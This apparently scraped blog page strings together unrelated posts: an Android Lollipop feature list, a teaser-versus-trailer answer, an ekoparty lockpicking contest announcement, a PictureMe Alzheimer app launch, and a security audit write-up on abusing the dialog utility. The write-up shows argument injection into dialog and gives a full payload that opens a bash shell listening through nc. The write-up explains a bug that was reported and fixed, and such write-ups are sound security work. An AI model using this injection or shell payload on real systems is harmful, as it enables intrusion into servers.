Android 5.0 "Lollipop" is the latest version of Android mobile phone operating system which is developed by Google




 

   Material Design

   
A bold, colorful, and responsive UI design for consistent, intuitive experiences across all your devices
        Responsive, natural motion, realistic lighting and shadows, and familiar visual elements make it easier to navigate your device
        Vivid new colors, typography, and edge-to-edge imagery help to focus your attention
    Notifications








   


 New ways to control when and how you receive messages - only get interrupted when you want to be
        View and respond to messages directly from your lock screen. Includes the ability to hide sensitive content for these notifications
        For fewer disruptions, turn on Priority mode via your device’s volume button so only certain people and notifications get through. Or schedule recurring downtime like 10pm to 8am when only Priority notifications can get through
        With Lollipop, incoming phone calls won’t interrupt what you’re watching or playing. You can choose to answer the call or just keep doing what you’re doing
        Control the notifications triggered by your apps; hide sensitive content and prioritize or turn off the app’s notifications entirely
        More intelligent ranking of notifications based on who they’re from and the type of communication. See all your notifications in one place by tapping the top of the screen
    Battery

    Power for the long haul
        A battery saver feature which extends device use by up to 90 mins
        Estimated time left to fully charge is displayed when your device is plugged in
        Estimated time left on your device before you need to charge again can now be found in battery settings
    Security

 
   Keep your stuff safe and sound
        New devices come with encryption automatically turned on to help protect data on lost or stolen devices
        SELinux enforcing for all applications means even better protection against vulnerabilities and malware
        Use Android Smart Lock to secure your phone or tablet by pairing it with a trusted device like your wearable or even your car
    Device Sharing

    More flexible sharing with family and friends
        Multiple users for phones. If you forget your phone, you still can call any of your friends (or access any of your messages, photos etc.) by simply logging into another Android phone running Lollipop. Also perfect for families who want to share a phone, but not their stuff
        Guest user for phones and tablets means you can lend your device and not your stuff
        Screen pinning: pin your screen so another user can access just that content without messing with your other stuff
    New Quick Settings

    Get to the most frequently used settings with just two swipes down from the top of the screen
        New handy controls like flashlight, hotspot, screen rotation and cast screen controls
        Easier on/off toggles for Wi-Fi, Bluetooth, and location
        Manually adjust your brightness for certain conditions. Then, adaptive brightness will kick in based on ambient lighting
    Connectivity

    A better internet connection everywhere and more powerful Bluetooth low energy capabilities
        Improved network handoffs resulting in limited interruption in connectivity. For example, continue your video chat or VoIP calls without interruption as you leave the house and switch from your home Wi-Fi back to cellular
        Improved network selection logic so that your device connects only if there is a verified internet connection on Wi-Fi
        Power-efficient scanning for nearby Bluetooth low energy (“BLE”) devices like wearables or beacons
        New BLE peripheral mode
    Runtime and Performance

    A faster, smoother and more powerful computing experience
        ART, an entirely new Android runtime, improves application performance and responsiveness
            Up to 4x performance improvements
            Smoother UI for complex, visually rich applications
            Compacting backgrounded apps and services so you can do more at once
        Support for 64 bit devices, like the Nexus 9, brings desktop class CPUs to Android
            Support for 64-bit SoCs using ARM, x86, and MIPS-based cores
            Shipping 64-bit native apps like Chrome, Gmail, Calendar, Google Play Music, and more
            Pure Java language apps run as 64-bit apps automatically
    Media

    Bolder graphics and improved audio, video, and camera capabilities
        Lower latency audio input ensuring that music and communication applications that have strict delay requirements provide an amazing realtime experience
        Multi-channel audio stream mixing means professional audio applications can now mix up to eight channels including 5.1 and 7.1 channels
        USB Audio support means you can plug USB microphones, speakers, and a myriad of other USB audio devices like amplifiers and mixers into your Android device
        OpenGL ES 3.1 and Android extension pack brings Android to the forefront of mobile graphics putting it on par with desktop and console class performance
        A range of new professional photography features for Android Lollipop that let you
            Capture full resolution frames around 30 fps
            Support raw formats like YUV and Bayer RAW
            Control capture settings for the sensor, lens, and flash per individual frame
            Capture metadata like noise models and optical information
        State of the art video technology with support for HEVC to allow for UHD 4K video playback, tunneled video for high quality video playback on Android TV and improved HLS support for streaming
    OK Google

    Easy access to information and performing tasks
        Even if your screen is off, you can say "OK Google" on devices with digital signal processing support such as Nexus 6 and Nexus 9
        Talk to Google on the go to get quick answers, send a text, get directions and more
    Android TV

    Support for living room devices
        User interface adapted for the living room
        Less browsing, more watching with personalized recommendations for content like movies and TV shows
        Voice search for Google Play, YouTube and supported apps so you can just say what you want to see
        Console-style Android gaming on your TV with a gamepad
        Cast your favorite entertainment apps to your big screen with Google Cast support for Android TV devices
    Accessibility

    Enhanced low vision and color blind capabilities
        Boost text contrast or invert colors to improve legibility
        Adjust display to improve color differentiation
    Now in 68+ languages

    15 new additions
        Basque, Bengali, Burmese, Chinese (Hong Kong), Galician, Icelandic, Kannada, Kyrgyz, Macedonian, Malayalam, Marathi, Nepali, Sinhala, Tamil, Telugu
    Device set up

    Get up and running in no-time
        Tap & go: instant set up of your new Android phone or tablet by simply tapping it to your old one (requires NFC)
        Whenever you get a new Android phone or tablet, you can bring over your apps from Google Play automatically from any of your old Android devices
    And a whole lot more
        Tap & pay: easily manage multiple payment apps by quickly switching between them
        Print preview and page range support
        Revamped display for battery, Bluetooth, data usage, and Wi-Fi settings and new search functionality in settings
        New device level feedback for Nexus devices in Settings > about phone > send feedback
        Easier sharing with
            Improved ranking of your options within the share menu
            Android Beam: lets you share a file with someone nearby by gently tapping the two devices together
        Where supported by the hardware, your device will wake up as soon as you pick it up or tap the screen twice
        Improved hardware keyboard accessory support including support for multilingual, emoji input, search key, and improved app and system key chords
Source Android.com

What is the difference between a teaser and a full trailer? What is the idea behind a teaser, what should it do to the audience?

Teaser is usually a very short (30sec to 1 min ) long video footage that contains shots from the scene so as to increase hype and publicity about a movie.Mostly big budget movies have a teaser, and as the name suggests teaser is used to tease the audience, not letting them know much about the movie.



Trailer is a bigger (1 -5 minutes or even longer) video clip which contains shots from the movie compiled in such a way to maximise some of the following things like publicity, suspense, interest, excitement , etc. In a trailer more story and events of the story is revealed

الخميس، 23 أكتوبر 2014

ekoparty 2014 - Lockpicking Game

Nuevamente este año estamos coordinando el area de Lockpicking en la edición numero 10 de la ekoparty!
Para refrescarles un poco la memoria en el siguiente articulo pueden ver lo que realizamos en la edición 2013


Este año la idea es recrear un área física, en donde los participantes van a tener que utilizar todas sus habilidades para identificar, obtener información, vulnerar y aislar desafíos relacionados tanto a la Seguridad Física como Informática. 

El control de acceso al área estará limitada por cerraduras de varios tipos (tambor, trabex, candados, biométria, entre otras cosas). 

Para poder sortear estas será necesario investigar y explotar distintas vulnerabilidades, para distintos escenarios como por ejemplo un desafío de criptografía o de análisis de un binario.
Estos serán algunos de los desafíos que los participantes podrán encontrarse el largo del desarrollo del mismo.

La temática será en grupos, es fundamental que estos deban pensar una estratégica o una manera colaborativa para resolver los mismos, quienes resuelvan la mayor cantidad de desafíos en el menor tiempo serán los ganadores del juego.

El premio sera anunciado antes de iniciar la Ekoparty por las vías oficiales del evento 

Materiales:

  • Se permite el uso de computadoras propias, donde podrá utilizar sus propios scripts o herramientas informáticas.
  • Ganas de divertirse!
Les dejamos un bosquejo de lo que se pueden encontrar!!



Los esperamos!!

Equipo de Trabajo:
Juan Urbano Stordeur
Juani Bousquet
Nicolas Trippar
Andres Pablo Sanchez
Korantin Auguste
Franco Linares

ekoparty 2014 - Lockpicking Game

Returning this year we will be running the Lockpicking stand in the 10th edition of the ekoparty!


This year the idea is to recreate a physical space, where the participants are going to have to use all their smarts and abilities to identify and obtain important information, and then to penetrate and isolate the different challenges. The challenges willl test the participants´ knowledge both in physical and cyber security.

The access control will be tricky to get into because there will be numerous types of locks (skeleton keys, padlocks and yale locks, biometrics as well as a few surprises)

To be able to overcome the different steps in the Box challenge it will be necessary to research and exploit various vulnerabilities. Some will be familiar and others will not so much such a s a cryptography challenge and a binary analysis. 

The challenge will be completed in groups and its fundamental that the participants think of a good strategy or how best to collaborate to be able beat the BOX. Those that pass the largest quantity of challenges in the least time will be the winner.


The award will be announced before the beginning of the EKOparty.

Materials:
  • The use of your own computer will be allowed, where it will be possible to use your own scripts or individual tools.
  • A good attitude looking to have some fun!


We leave you with a sketch of what you will find!



See you guys there!

Project Team:
Juan Urbano Stordeur
Juani Bousquet
Nicolas Trippar
Andres Pablo Sanchez
Korantin Auguste

الثلاثاء، 21 أكتوبر 2014

PictureMe released, a new app for Alzheimers patients

This new app tries to help improve the quality of live for those that suffer from this terrible disease.

PictureMe, a smartphone app that turns your phone into a life camera, allowing for pictures to be taken every few seconds. Studies have been shown that this helps to offset memory loss, improving the quality of life for those with the disease.


Alzheimer is a neuro- degenerative disease, that affects one´s memory, thought, behavior and daily activities that many of us take for granted. This is due to the gradual loss of nervous system cells.

The ailment is most prevelant in those over 65, affecting over 37 million people today and given the general greying of the population, its estimated that in 2050 there will be over 115 millon people suffering from this dissease.

Although there is of yet no known cure, there are different ways to alleviate its impact.

The prestigious neuro-scientist and researcher (studied and worked in both Harvard and Cambridge) Facundo Manes, stresses that one of the most effective strategies for reducing  cognitive deterioration, is to try to protect healthy neurons¨.

Following Infobyte´s strong commitment to corporate social responsibility, we have developed PictureMe, that instantly records photos for the wearer and allows them to review these photos at the end of the day or whenever they want. This is shown to reduce memory loss and protect neurons.

PictureMe, aplicación para pacientes con AlzheimerPictureMe is an Open Source app and can be obtained 100% free, for those with these disease or for a family member looking to help. The app will be available on the Google Play App store and all proceeds will be donated to the the NGO, Salud Activa (http://www.saludactiva.org.ar/), a not-for-profit working to improve the quality of life of those with dementia and alzheimers and works to improve awareness and treatment in the community.

The predecessor of PictureMe was Sensecam, a device with the same goal made by Microsoft and licensed to different businesses for its commercialisation with a price of over $400.

With the popularization of Smartphones, including having multiple cameras and the rapid imporvement of both the hardward and software of the devices it is not quite easy to have this tool with out spending a fortune. PictureMe is now an ideal ally in the fight against Alzheimers.


You can download the app as well the source code here:
https://github.com/infobyte/pictureme

If you want to support the project and want to download it, check out:
https://play.google.com/store/apps/details?id=com.pictureme

For more information, go to http://www.pictureme.ws/

الاثنين، 20 أكتوبر 2014

Lanzamos PictureMe, aplicación para pacientes con Alzheimer

La aplicación contribuye al mejoramiento y calidad de vida de quienes sufren la enfermedad.

PictureMe, una aplicación para smartphones que les permite a quienes sufren la enfermedad registrar cada momento de sus vidas, contribuyendo de esta manera al mejoramiento de su memoria y de su calidad de vida

El Mal de Alzheimer es una terrible enfermedad neurodegenerativa, que afecta a la memoria, al pensamiento, al comportamiento y a las actividades diarias a medida que mueren las células nerviosas (neuronas).
Aparece con mayor frecuencia en personas mayores de 65 años, afectando hoy en día a 37 millones de personas, y debido al aumento de expectativa de la población, se estima que en el 2050 serán 115 millones los que sufrirán este mal.

Si bien hasta hoy el síndrome es incurable, existen diferentes maneras de reducir su impacto.

El prestigioso neurocientífico e investigador Facundo Manes, formado en Harvard y Cambridge, director del “Instituto Alzheimer”  y autor del libro “Convivir con personas con Alzheimer y otras demencias”,
afirma que “una de las estrategias más eficaces para reducir el deterioro cognitivo, es proteger aquellas neuronas sanas”

Siguiendo esta misma línea, y contribuyendo a mejorar la calidad de vida y a atenuar el deterioro cognitivo de quienes se ven afectados, y dentro de las políticas de Responsabilidad Social Empresaria de nuestra compañía, hemos desarrollado PictureMe, que convierte al equipo en un “Instant Life Recorder”, es decir una grabadora instantánea de vida.

PictureMe, aplicación para pacientes con Alzheimer

PictureMe, aplicación para pacientes con AlzheimerPictureMe es una aplicación Open Source y se puede obtener de manera 100 % gratuita, para que todo afectado o el entorno familiar del que sufre la enfermedad pueda acceder a ella. La aplicación va a estar también disponible desde el Android Market los ingresos obtenidos serán cedidos a la ONG Salud Activa, institución sin fines de lucro que tiene como misión mejorar la calidad de vida de las personas y de la comunidad.

PictureMe permite a sus usuarios llevar un registro diario y de cada pocos segundos de su entorno. De acuerdo a Estudios científicos de la Universidad de Cambridge,  se comprobó que la revisión de los acontecimientos diarios documentados en fotos permite mejorar en pacientes con Alzheimer la memoria y la calidad de vida.

Un antecedente de Pictureme es Sensecam, un dispositivo con el mismo objetivo creado por Microsoft, licenciado por diversas empresas para su comercialización. A un costo superior de u$s 400.

Con la popularización de los Smartphones, la mejora continua en las cámaras incorporadas y el aumento de hardware de los dispositivos, PictureMe se convierte hoy en un aliado ideal para la contención de la enfermedad.

Se puede acceder a la aplicación y código de fuente desde aquí:
https://github.com/infobyte/pictureme

Si queres apoyar este proyecto puedes bajarla desde aquí:
https://play.google.com/store/apps/details?id=com.pictureme

Para más información, acceder al sitio web de PictureMe en http://www.pictureme.ws/

الجمعة، 17 أكتوبر 2014

Abusing « dialog » for fun and profit

If you want to design a command-line utility with a graphical user interface, you have the choice of using a full-featured library like curses, or using an utility like « dialog ».
Dialog is a program you can call with arguments specifying what you want to display (input box, menu…).
Here is an example of the result of the « dialog --msgbox "Hello world.\n\nHow are you ?" 0 0 » command :


During a system audit, we had access to a server that only had a command-line GUI interface. This interface presented menus allowing us to do various diagnostics to the server (that would end up executing scripts)...
Of course, our goal was to find a bug in this interface to execute arbitrary code on the server.

After a little analysis, we found out that the whole script for the GUI interface was calling the « dialog » command to display the various dialog presented to the user.

From parameter injection...

We encountered code to execute a diagnostic script, providing it a number as a parameter :
n = ""
while not n.isdigit():
n = dialog_input("Enter a number", n)

system("/root/diagnostic_script %s" % n)
With the dialog_input function being like :
def dialog_input(question, default):
args = shlex.split('dialog --inputbox "%s" 10 50 "%s"' % (question, default))
_, stderr = subprocess.Popen(args, stderr=subprocess.PIPE).communicate()
return stderr.decode()
So, the more obvious way would have been to put a string like "; whoami" in the dialog, to have the system() execute our code.
However, this is made impossible because the number is validated, and if we enter an invalid number we will be asked again.
But what is really interesting is that the old number we entered (that is invalid !) will be set as the default value of the input, by passing it as an argument for the dialog command.
So, what happens if we put a quote in the number we enter ? As it is invalid, dialog_input() is called again, and booom, shlex.split is lost :
Traceback (most recent call last):
...
ValueError: No closing quotation
So, it's obvious that from now, we can inject arguments for the « subprocess.Popen » call (as long as we put an even number of quotes in the dialog).
The scope of what we can do is very limited. We can't use shell tricks like a semicolon or a pipe to execute other commands : subprocess.Popen directly call the « dialog » command (as the shell argument is False by default), so we can only control its parameters.
So, we have to dig into how dialog works. We can see that calls like « dialog --inputbox "foo" 10 50 "bar" --inputbox "foo2" 10 50 "bar2" » works fine, as dialog iteratively parse its argument and allow multiple widgets to be displayed successively.
Let's see if we can find some useful widgets ! After reading the manual, there is « --dselect » that is a directory chooser (so we can see the content of the filesystem), and « --textbox » that can display the content of a file :)


So, we have arbitrary (read) access to the filesystem !


... to arbitrary command execution...

However, we also found one very interesting widget : prgbox.
--prgbox command height width
A prgbox is very similar to a programbox.

This dialog box is used to display the output of a command that is specified as an argument to prgbox.

After the command completes, the user can press the ENTER key so that dialog will exit and the calling shell script can continue its operation.
So, this widget was designed… to execute any command.
However, during our trials it was impossible to have it work correctly because each time we put shell commands the behavior was completely unexpected, often resulting in an empty result.

...by working around a nasty bug !

We looked at the source code of the prgbox widget and found that :
sprintf(blob, "-c %s", command);
argv = dlg_string_to_argv(blob); // will convert the command in « blob » to a list of arguments.
execvp("sh", argv);
Which shown clearly that our command was executed using « sh -c command », so using shell should have worked !
However, shouldn't argv[0] contain « sh » ? It is this !
When « sh » was called, its argv[0], instead of containing « sh », was « -c » (so it ignored this argument, thinking it was its name !).
A quick workaround to allow our exploit to work was to insert « -c » at the beginning of the command we passed to the prgbox widget, for sh to correctly have « -c » as its argv[1].
So, at the end we were able to spawn a backdoor shell in our target server, simply by entering this in the input box asking for the IP address to ping :
" --prgbox "-c \"rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/bash -i 2>&1|nc -l 8000 >/tmp/f\"" 30 70 --title "
Success !

We also contacted the author of dialog to inform him of the bug, that was corrected in the last version of dialog.

It was also very funny to dig into the dialog source code, and see that there is even an option « --file » that allows an user to put more arguments in a file (they will be inserted in place during the process of parsing the arguments). And putting another « --file » option referencing to itself inside such a file could have led to infinite recursion ! So the program contains a counter of the recursion depth and don't allow it to be more than 20.

Conclusion

When you use an external program like dialog, be very careful with what you allow the user to inject in the parameters. As we have just seen, even if the command is not interpreted in the shell, it is possible to misuse the program you are calling to end up executing arbitrary code.

And when we search github for misuse examples, it seems that it is quite easy to encounter…